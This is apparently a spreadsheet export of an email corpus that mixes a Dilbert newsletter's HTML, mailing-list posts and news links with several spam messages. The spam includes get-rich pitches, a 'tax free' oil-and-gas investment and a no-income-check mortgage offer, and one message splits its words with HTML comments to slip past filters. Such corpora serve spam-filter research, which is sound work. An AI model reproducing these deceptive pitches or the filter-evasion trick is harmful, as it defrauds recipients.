 WIDTH=3D"6" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"19" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/image=
 s/header_online_store.gif" WIDTH=3D"200" HEIGHT=3D"15" BORDER=3D"0" ALT=3D"=
 "&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif=
 " WIDTH=3D"4" HEIGHT=3D"4" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"9" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"9" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BACKGROUND=3D"http://www.comi=
 cs.com/comics/dilbert/daily_dilbert/images/white_line_right.gif" ROWSPAN=3D=
 "6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"349" ROWSPAN=3D"7"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGH=
 T=3D"349" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"200" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/books.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Books"&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://umm=
 ail4.unitedmedia.com:80/Click?q=3D78-d5tsIdUgx-7KLIF5viMd-qmfZRRR"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/ads/book_badge.gif" WIDTH=3D"169" =
 HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Another Day in Cubicle Paradise"&gt;&lt;/A&gt;&lt;BR&gt;=
 &lt;BR&gt;Complete your collection while pretending to work!&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D8d=
 -nbp1Q7nx54aoOTgIikuIXxa-L9RR"&gt;&gt; Shop&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"83" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click=
 ?q=3Da2-6-07QXZoTv3TbpE9R6C1DQolgRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/com=
 ics/dilbert/daily_dilbert/images/thumb_dilbert_mints.gif" WIDTH=3D"83" HEIG=
 HT=3D"57" BORDER=3D"0" ALT=3D"Dilbert Mints"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/mints.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Graphic (live connection required)"&gt;&lt;BR&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"120=
 " HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;They're character-shaped, in colle=
 ctible tins.&lt;BR&gt;&lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedm=
 edia.com:80/Click?q=3Db7-FOkPQ8JogORm2Ip0N-bWBXqWPdRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"162" HEIGHT=3D"24" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/clothing_and_posters.gif" WIDTH=
 =3D"121" HEIGHT=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;Get any Dilbert strip publ=
 ished in the last 90 days printed on a&lt;BR&gt;T-shirt, sweatshirt or poster. Se=
 lected older strips are also available.&lt;BR&gt;
 &lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Clic=
 k?q=3Dcc-h4hQQ0OYtV3XRIW7qlZmmgdcodRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDT=
 H=3D"148" HEIGHT=3D"20" BORDER=3D"0" ALT=3D""&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09&lt;TD WIDTH=3D"14" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"=
 http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gif" WIDTH=
 =3D"14" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"148" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3De1-6RSNQxkAWvzksAFPh9YLA-VXvsRR"&gt;View all pro=
 ducts&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"5" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"585" HEIGHT=3D"5" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;!-- COMIC STRIP HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT face=3D"helvet=
 ica, arial" size=3D1&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily=
 _dilbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0=
 "&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D=
 f6-QkaIQMwXDgaXW-XYYdGxFRTBe9RR"&gt;Modify Your Account&lt;/A&gt;/&lt;A target=3D"_blan=
 k" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D0b-0NK-INQtdZl2ya_Gf=
 wmMRCSDiRRR"&gt;Unsubscribe&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=3D"RIGHT" BGCOLOR=3D"#FFF=
 FFF" COLSPAN=3D"7"&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A target=3D"=
 _blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D21-UPiOIjdgVF9D=
 SQYoQIYk88r4jdRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_di=
 lbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;B=
 uy This Strip&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A HREF=3D"http://www.comics.com/webmail=
 /SendAStrip?AppName=3DSendAStrip&amp;ComicName=3D/comics/dilbert/&amp;Attachments=
 =3D/comics/dilbert/archive/images/dilbert2003482920717.gif&amp;EmailDate=3DJuly=
 -17-2002"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/im=
 ages/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Send This=
  Strip to a Friend&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A target=3D"_blank" HREF=3D"http:/=
 /ummail4.unitedmedia.com:80/Click?q=3D36-wgY-IiItoUKXe2aMxgHvr6RUNsRR"&gt;&lt;IMG=
  SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gi=
 f" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Month of Dilbert&lt;/A&gt;&amp;nb=
 sp;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"10"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D4b-k_F7=
 IBUUPQW8ARQP9aAvvFGTn9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/=
 archive/images/dilbert2003482920717.gif" BORDER=3D"0" ALT=3D"You need to go=
  online to see today's strip and other cool features on the Daily Dilbert."=
 &gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.=
 gif" WIDTH=3D"600" HEIGHT=3D"8" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- FOOTER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"610" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" HEIGHT=3D"1" BGCOLOR=3D"#003366" COLSPAN=
 =3D"8"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"610" HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"4" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"478" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"478" HEIGHT=3D"4"=
  BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D60-oqKt=
 IsE2uhVC0kDLNLS4fYkaERRR"&gt;Unsubscribe&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"ht=
 tp://ummail4.unitedmedia.com:80/Click?q=3D75-whVtIKU2Iu8GQEo_rEuIwvpIpdRR"&gt;=
 Modify Your Subscription&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"http://ummail4.=
 unitedmedia.com:80/Click?q=3D8a-3y2dQXn0aNjA02KO3Btq9D6yURRR"&gt;Request a New=
  Subscription&lt;/A&gt; | &lt;a href=3D"mailto:dilberthelp@unitedmedia.com"&gt;Report S=
 ubscription Problems&lt;/A&gt;&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D9f=
 -o7QMQ1J0L3ntQajYlZGsyOF6BdRR"&gt;Subscribe to the Dilbert Newsletter/Join Dog=
 bert's New Ruling Class&lt;/A&gt; |&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Db4=
 -aJFbQ6Z3xDlOmpkqJ7DOkTHEPsRR"&gt;Dilbert on Your Site/Intranet&lt;/A&gt; | &lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dc9-3OPLQpg=
 OUNkuGQYjg6SO6eP2hsRR"&gt;Advertising Info&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"=
 http://ummail4.unitedmedia.com:80/Click?q=3Dde-7tLkQMW9OAU-vjatTKD2NHz7HRRR=
 "&gt;Dilbert in Your Publication&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"45" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"45" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"62" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"62" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3Df3-LjVgQJOyjR2hzkpCsHCfK5y7mRRR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/comics_com_logo.gif" WID=
 TH=3D"62" HEIGHT=3D"42" BORDER=3D"0" ALT=3D"Comics.com"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" BACKGROUND=3D"http://www.comics.com/comics/d=
 ilbert/daily_dilbert/images/white_line_right.gif"&gt;&lt;IMG SRC=3D"http://www.co=
 mics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" HEIGHT=3D"4" BORD=
 ER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" COLSPAN=3D"8"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/daily_dilbert_footer.gif" WIDTH=
 =3D"610" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- FOOTER TABLE END --&gt;
 =09=09=09
 =09=09&lt;/TD&gt;
 =09=09&lt;TD&gt;
 =09=09
 =09=09=09
 =09=09
 =09=09=09&lt;!-- SKYSCRAPER TABLE BEGIN --&gt;
 =09=09=09&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" height=3D"=
 600"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/=
 small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" BORDER=3D"0" ALT=3D"Advertisement"=
 &gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif"=
  WIDTH=3D"2" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=
 =3D1D74C2EA&amp;pcode=3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flow=
 go.com/images/bt/p2p.gif?ccode=3D1D74C2EA&amp;pcode=3DEF39755C" width=3D120 hei=
 ght=3D600 border=3D0&gt;&lt;/a&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/table&gt;
 =09=09=09&lt;!-- SKYSCRAPER TABLE END --&gt;
 =09=09=09
 =09=09=09
 =09=09=09
 =09=09&lt;/TD&gt;
 =09&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE END --&gt;
 &lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=3DAFEBB3C4&amp;pcode=
 =3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flowgo.com/images/bt/=
 p2p.gif?ccode=3DAFEBB3C4&amp;pcode=3DEF39755C" width=3D"120" height=3D"600" bor=
 der=3D"0"&gt;&lt;/a&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://ummail4.unitedmedia.com:80/Click?q=
 =3D09-jooSno8-sksh69p0bkgiUM1v"&gt;
 --25685224.1026891797705.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: credit processing is easy 189
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 A&lt;!--mom and dad--&gt;ccept C&lt;!--grandma and grandpa--&gt;redit C&lt;!--aunt kate--&gt;ards - Everyone A&lt;!--uncle don--&gt;pproved&lt;p&gt;
 NO C&lt;!--hi family--&gt;REDIT CH&lt;!--i love you all--&gt;ECKS
 &lt;p&gt;
 &lt;a href=http://www.requestedinfo.net/cgi-bin/rbis.cgi?code=btbtbR&gt;DO IT NOW&lt;/a&gt;
 &lt;p&gt;
 &lt;/html&gt;
 189
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EARN 10K PER WEEK with a NEW SYSTEM!                                   9652cYUh7-164RdH-15
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings!
 You can earn up to 10K per week doing simple 
 online tasks with a brand new system called EMM? 
 It blows MLM away:
 No selling...
 No recruiting...
 No explaining or answering difficult questions...
 No 3-way calling...
 No begging friends and family...
 No rejection... 
 All you have to do is advertise, advertise, 
 advertise and then enter the e-mail addresses 
 of your prospects into a full-time automated 
 system. This system:
 =  does ALL of your support,
 =  answers ALL of the email from your group members,
 =  handles ALL of your correspondence
 =  works day and night to turn your advertising 
    into residual income!
 It is absolutely phenomenal!
 To get the full details, please put "Send EMM Info"
 in subject line, then send to the address below:
 mailto:tim1@btamail.net.cn?subject=Send_EMM_Info
 Thank You!
 PS: Removal Instruction - Just click below and send.
 mailto:ma5s@yahoo.com?subject=Remove_Please
 9779kl5
</t>
  </si>
  <si>
    <t xml:space="preserve">Dave Long writes:
 &gt; &gt; (and no it wasnt me even though the spellingis
 &gt; &gt; oddly familar)
 &gt; 
 &gt; Not that this is news to FoRKs, but:
 &gt; 
 &gt; &lt;http://www.j-bradford-delong.net/movable_type/archives/000393.html&gt;
 &gt; 
 &gt; &gt; ... randomising letters in the middle of words [has] little or no
 &gt; &gt; effect on the ability of skilled readers to understand the text. This
 &gt; &gt; is easy to denmtrasote. In a pubiltacion of New Scnieitst you could
 &gt; &gt; ramdinose all the letetrs, keipeng the first two and last two the same,
 &gt; &gt; and reibadailty would hadrly be aftcfeed. My ansaylis did not come
 &gt; &gt; to much beucase the thoery at the time was for shape and senqeuce
 &gt; &gt; retigcionon.  Saberi's work sugsegts we may have some pofrweul palrlael
 &gt; &gt; prsooscers at work. The resaon for this is suerly that idnetiyfing
 &gt; &gt; coentnt by paarllel prseocsing speeds up regnicoiton. We only need
 &gt; &gt; the first and last two letetrs to spot chganes in meniang.
 Hmm, there's probably a patentable input-method for 
 touch-tone keypads in there somewhere.
 - Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: LOOK !  Y O U  are a W I N N E R  here !  -  Don't miss out  !  !                                7504
</t>
  </si>
  <si>
    <t xml:space="preserve">Y O U R  last chance for 
 Y O U R $3000.00 INCOME per WEEK!
 Give Me 5 Minutes, And I'll Show You
 How To Flood Your Bank Account With Serious Cash,
 DID YOU MAKE $12,000 LAST MONTH
 IF NOT, YOU NEED TO JOIN US TODAY!
 - FREE Turnkey Marketing System (a $2500 Value)
 - FREE Ready-to-Use "Order-Pulling" Ads &amp; Sales Letters
 - Earn $1,000 CASH on Each and Every Sale to Infinity!
 - Work From Home and Live the "1-Minute" Commute
 - Plug Into Our Duplicate-able 3-Step Success System
 - YOU receive FULL live SUPPORT! For free!
 - Secure Your Financial Freedom Starting Today
 - Buy Your Dream House and Dream Car! 
 - Amazing Support System guarantees YOU to SUCCEED!
 - EVERYBODY is a Prospect - 100% Cash Machine !
 - EVERYBODY can do it!
 NO hype ! All legal !
 USA and Canada ONLY !
 Request more free info NOW! 
 send an email to:      Plutoristal@excite.com
 with "SEND INFO" in the subject line!!
 (do NOT click REPLY!)
 To remove, please send an email with "REMOVE" 
 in the subject line to the same email address (above).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</si>
  <si>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On Mon, Aug 12, 2002 at 08:33:26PM -0700, Vipul Ved Prakash wrote:
 &gt; On Mon, Aug 12, 2002 at 10:38:44AM -0700, Craig R . Hughes wrote:
 &gt;&gt; 
 &gt;&gt; if(check() == spam) then submit() else revoke()
 &gt;&gt; 
 &gt;&gt; That algorithm boosts trust, but reduces the information in 
 &gt;&gt; SpamNet by damping.
 &gt; 
 &gt; Again, this is not true. Only certain events (reports/revokes) for a spam
 &gt; are rewarded and the algorithm for picking these up is based on many
 &gt; different factors.
 A lot of the questions/concerns brought up on this list wrt
 TeS will be lessened when the source for it is released.  Any
 guestimate on when that might happen?
 -steve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</si>
  <si>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Turning junk computers into activist gold
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481566
 Date: Not supplied
 Great article on a group of East Bay activists who rehab junk computers, using 
 semi-skilled volunteers who train other semi-skilled volunteers. The resulting 
 computers are sent to the developing world for activist use. 
     For the Amazonian villages where there's no electricity or where phone 
     lines are scarce, the activists plan to set up free computer labs in the 
     nearby cities. Many cities already have commercial Internet cafes, but they 
     cost about a dollar per hour of use, Henshaw-Plath says, which is about a 
     day's wage for most of the population. 
     The IMC activists plan to ship off these computers to Guayaquil, Ecuador's 
     main port city, by the end of September. Because none of the computers are 
     being sold in Ecuador, and because they're being transferred from an 
     American nonprofit to an Ecuadorian one, the activists won't be charged any 
     international shipping duties on the computers. "It's what you call real 
     free trade," says Eddie Nix.  
 Link[1] Discuss[2] (_Thanks, Markoffcharney!_)
 [1] http://www.salon.com/tech/feature/2002/09/23/antiglobal_geeks/index.html
 [2] http://www.quicktopic.com/boing/H/gSpjZZSBcWc84
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Blix told to await new orders on Iraq
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535464,215/
 Date: 2002-10-04T02:39:01+01:00
 *World latest:* The US and Britain yesterday told the chief UN weapons 
 inspector not to resume inspections in Iraq until new guidelines were passed.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV Oil and Gas Investment tgym
</t>
  </si>
  <si>
    <t xml:space="preserve">How would you like a 100% tax free Investment in Oil and Gas wells? 
 Make over 100% annually and receive monthly tax free Income with 
 very low risk. If you are liquid for a $10,000 investment, email your 
 name, address, and phone number to 
 oilandgaspackage@aol.com and we will send you the information
 =================================================================
 To Unsubscribe from these special mailings:
  Forward this mail with "UNSUBSCRIBE" in the subject line to oilandgasremoval@aol.com
 =================================================================
 fghludnbnobfmohbvmsojkdkkf
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Let me know what you think!32482
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;&lt;body&gt;&lt;pre&gt;
 ______________________________________________________________________
 ______________________________________________________________________
 LOWEST RATES IN 45 YEARS -
 FILL OUT OUR SHORT APPLICATION FOR AN UNBELIEVABLE 3.50 - 5.0 % MORTGAGE
 (APR)
   () HOME REFINANCING
   () HOME IMPROVEMENT
   () DEBT-CONSOLIDATION
   () CASH-OUT
 Please Click &lt;a href=3D"http://210.192.106.2/mg/index.html"&gt;HERE&lt;/a&gt;
 for our short application.
 The following are NO problem and will not stop you from getting the
 financing you need:
   *** Can't show income
   *** Self-Employed
   *** Credit Problems
   *** Recent Bankruptcy
   *** Unconventional Loan
 We are a direct lender and we have hundreds of loan programs available.
 If we don't have a program that works for you, we have hundreds of wholesa=
 le
 relationships with other lenders. So no matter which of our
 50 states you live in, we likely have a program that could meet your
 needs.
 Please Click &lt;a href=3D"http://210.192.106.2/mg/index.html"&gt;HERE&lt;/a&gt;
 for our short application.
 * We DO NOT resell or disseminate your email address. You are NOT
 required to enter your SSN. This is a legitimate offer from legitimate
 mortgage companies.
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 Note: We are licensed in all 50 U.S. States.
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 To be REMOVED from future mailings click &lt;a href=3D"http://210.192.106.2/m=
 g/remove/remove.html"&gt;HERE&lt;/a&gt;.
 We will NEVER intentionally email you again. Thank You.
 ______________________________________________________________________
 ______________________________________________________________________
 &lt;/pre&gt;&lt;/body&gt;&lt;/html&gt;
 .........................................
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Gary Lawrence Murphy said:
 &gt; &gt;&gt;&gt;&gt;&gt; "S" == Stephen D Williams &lt;sdw@lig.net&gt; writes:
 &gt;     S&gt; A) Which religion is it that can claim no foul actions in its
 &gt;     S&gt; past?  Certainly not Christianity, Islam, etc.
 &gt; Rastafari.
 &gt; That is, if you concede that of the two founding branches, only the
 &gt; one founded by the Nyabingi were legit and the others were
 &gt; thinly-veneered anti-colonial hooligans.  
 &gt; There is also Vietnamese Buddhism, unless you count setting fire to
 &gt; oneself as a "foul action".
